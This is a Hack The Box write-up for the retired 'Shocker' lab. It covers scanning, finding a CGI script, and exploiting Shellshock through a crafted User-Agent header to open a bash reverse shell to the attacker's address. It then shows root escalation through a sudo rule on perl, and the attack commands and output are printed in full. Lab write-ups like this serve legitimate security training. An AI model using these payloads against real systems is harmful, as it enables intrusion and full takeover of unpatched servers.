Today we are going to solve another CTF challenge, "Shocker", a lab presented by Hack The Box for practising penetration testing online at your own experience level. HTB splits its labs into Active and Retired; since write-ups of Active labs may not be published, we have chosen the retired Shocker lab.
Level: Beginners
Task: find user.txt and root.txt file in the victim’s machine.
Let’s start with a basic nmap scan
c:\Users\jacco>nmap -sC -sV 10.10.10.56
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 22:03 W. Europe Summer Time
Nmap scan report for 10.10.10.56
Host is up (0.031s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.04 seconds
Only two services are exposed: Apache 2.4.18 on port 80 and OpenSSH 7.2p2 on the non-standard port 2222. Next, we use the dirb tool in Kali to enumerate directories on the web server and find a few interesting paths: /cgi-bin/, index.html and server-status. The 403 on /cgi-bin/ only means directory listing is forbidden; scripts inside it can still be executed, so a second run with the .sh extension is worthwhile.
root@kali:~/htb/shocker# dirb http://10.10.10.56

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue May 28 12:56:05 2019
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)
+ http://10.10.10.56/index.html (CODE:200|SIZE:137)
+ http://10.10.10.56/server-status (CODE:403|SIZE:299)

-----------------
END_TIME: Tue May 28 12:58:24 2019
DOWNLOADED: 4612 - FOUND: 3
root@kali:~/htb/shocker# dirb http://10.10.10.56/cgi-bin -X .sh

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue May 28 13:02:27 2019
URL_BASE: http://10.10.10.56/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:118)

-----------------
END_TIME: Tue May 28 13:04:47 2019
DOWNLOADED: 4612 - FOUND: 1
root@kali:~/htb/shocker# curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script
15:57:06 up 6:12, 0 users, load average: 0.00, 0.00, 0.00
A shell script served through /cgi-bin is the textbook target for Shellshock (CVE-2014-6271). Apache's mod_cgi hands every request header to the CGI program as an environment variable (User-Agent becomes HTTP_USER_AGENT), and an unpatched bash, when it starts, treats any environment value that begins with "() {" as an exported function definition and keeps executing whatever follows the closing brace. Because user.sh is run by bash, a crafted User-Agent header executes commands as the web server's user before the script's first line runs. The two echo statements in the payload emit the blank line that terminates the CGI header block, so Apache does not reject the output as malformed. Let's run the Shellshock payload against this file and see if we can pull a reverse shell. I looked across the internet to find the string that triggers the Shellshock bug and whipped something together. Start the listener first (nc -lvp 443), then send the request.
The command I used looked like this:
root@kali:~/htb/shocker# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.14/443 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh
root@kali:~/htb/shocker# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.56.
Ncat: Connection from 10.10.10.56:39634.
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
The "no job control" message is normal for a non-interactive reverse shell. Note that the CGI runs as the user shelly rather than the usual www-data, so the shell lands directly in an account with a home directory.
The same exploit scripted with a shellshock.py wrapper (this run uses 10.10.14.3 as the attacker address), followed by the user flag, the sudo check and the root shell:
root@kali:~/htb/shocker# ./shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.3 lport=443 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
10.10.10.56> ls
user.sh
10.10.10.56> cd /home
10.10.10.56> ls
shelly
10.10.10.56> cd shelly
10.10.10.56> cat user.txt
2ec*****233
10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
10.10.10.56> sudo /usr/bin/perl -e 'exec "/bin/sh"'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)
10.10.10.56> cat /root/root.txt
52c*****a467
sudo -l is the first thing to check after landing as a user: shelly may run /usr/bin/perl as root without a password, and perl's exec replaces the interpreter with /bin/sh while keeping root's uid, so this one line is a direct root shell. Any sudo rule on an interpreter (perl, python, ruby) or on a binary that can spawn a shell is equivalent to unrestricted root.
Author: Jacco Straathof